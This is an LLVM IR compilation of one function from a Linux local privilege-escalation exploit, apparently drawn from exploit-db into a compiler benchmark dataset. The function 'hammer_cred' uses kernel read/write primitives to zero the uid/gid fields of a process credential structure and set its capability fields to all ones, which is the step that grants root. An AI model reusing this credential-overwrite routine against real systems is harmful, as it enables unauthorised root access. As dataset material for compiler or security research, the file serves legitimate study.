; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_45010.c_hammer_cred.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_45010.c_hammer_cred.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [34 x i8] c"hammering cred structure at %llx\0A\00", align 1
@llvm.used = appending global [1 x i8*] [i8* bitcast (void (i64)* @hammer_cred to i8*)], section "llvm.metadata"

; Function Attrs: noinline nounwind optnone uwtable
define internal void @hammer_cred(i64 %0) #0 {
  %2 = alloca i64, align 8
  %3 = alloca i64, align 8
  store i64 %0, i64* %2, align 8
  %4 = load i64, i64* %2, align 8
  %5 = call i32 @msg(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str, i64 0, i64 0), i64 %4)
  %6 = load i64, i64* %2, align 8
  %7 = call i32 @read64(i64 %6)
  %8 = sext i32 %7 to i64
  %9 = and i64 %8, 4294967295
  store i64 %9, i64* %3, align 8
  %10 = load i64, i64* %2, align 8
  %11 = load i64, i64* %3, align 8
  %12 = call i32 (i64, i64, ...) bitcast (i32 (...)* @write64 to i32 (i64, i64, ...)*)(i64 %10, i64 %11)
  %13 = load i64, i64* %2, align 8
  %14 = add i64 %13, 8
  store i64 %14, i64* %2, align 8
  %15 = load i64, i64* %2, align 8
  %16 = call i32 (i64, i32, ...) bitcast (i32 (...)* @write64 to i32 (i64, i32, ...)*)(i64 %15, i32 0)
  %17 = load i64, i64* %2, align 8
  %18 = add i64 %17, 8
  store i64 %18, i64* %2, align 8
  %19 = load i64, i64* %2, align 8
  %20 = call i32 (i64, i32, ...) bitcast (i32 (...)* @write64 to i32 (i64, i32, ...)*)(i64 %19, i32 0)
  %21 = load i64, i64* %2, align 8
  %22 = add i64 %21, 8
  store i64 %22, i64* %2, align 8
  %23 = load i64, i64* %2, align 8
  %24 = call i32 (i64, i32, ...) bitcast (i32 (...)* @write64 to i32 (i64, i32, ...)*)(i64 %23, i32 0)
  %25 = load i64, i64* %2, align 8
  %26 = add i64 %25, 8
  store i64 %26, i64* %2, align 8
  %27 = load i64, i64* %2, align 8
  %28 = call i32 (i64, i32, ...) bitcast (i32 (...)* @write64 to i32 (i64, i32, ...)*)(i64 %27, i32 0)
  %29 = load i64, i64* %2, align 8
  %30 = add i64 %29, 8
  store i64 %30, i64* %2, align 8
  %31 = load i64, i64* %2, align 8
  %32 = call i32 (i64, i64, ...) bitcast (i32 (...)* @write64 to i32 (i64, i64, ...)*)(i64 %31, i64 -1)
  %33 = load i64, i64* %2, align 8
  %34 = add i64 %33, 8
  store i64 %34, i64* %2, align 8
  %35 = load i64, i64* %2, align 8
  %36 = call i32 (i64, i64, ...) bitcast (i32 (...)* @write64 to i32 (i64, i64, ...)*)(i64 %35, i64 -1)
  %37 = load i64, i64* %2, align 8
  %38 = add i64 %37, 8
  store i64 %38, i64* %2, align 8
  %39 = load i64, i64* %2, align 8
  %40 = call i32 (i64, i64, ...) bitcast (i32 (...)* @write64 to i32 (i64, i64, ...)*)(i64 %39, i64 -1)
  %41 = load i64, i64* %2, align 8
  %42 = add i64 %41, 8
  store i64 %42, i64* %2, align 8
  ret void
}

declare dso_local i32 @msg(i8*, i64) #1

declare dso_local i32 @read64(i64) #1

declare dso_local i32 @write64(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
